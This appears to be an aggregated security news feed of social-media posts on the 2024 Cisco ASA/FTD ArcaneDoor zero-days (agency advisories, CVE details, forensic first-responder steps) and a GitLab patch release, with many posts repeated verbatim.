Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) https://fortiguard.fortinet.com/threat-signal-report/5429
##Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) https://www.helpnetsecurity.com/2024/04/24/cve-2024-20353-cve-2024-20359/ #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##updated 2024-04-25T15:30:45
4 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-25T15:30:38
4 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-25T12:30:56
4 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-25T12:30:51
4 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-25T12:30:50
4 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
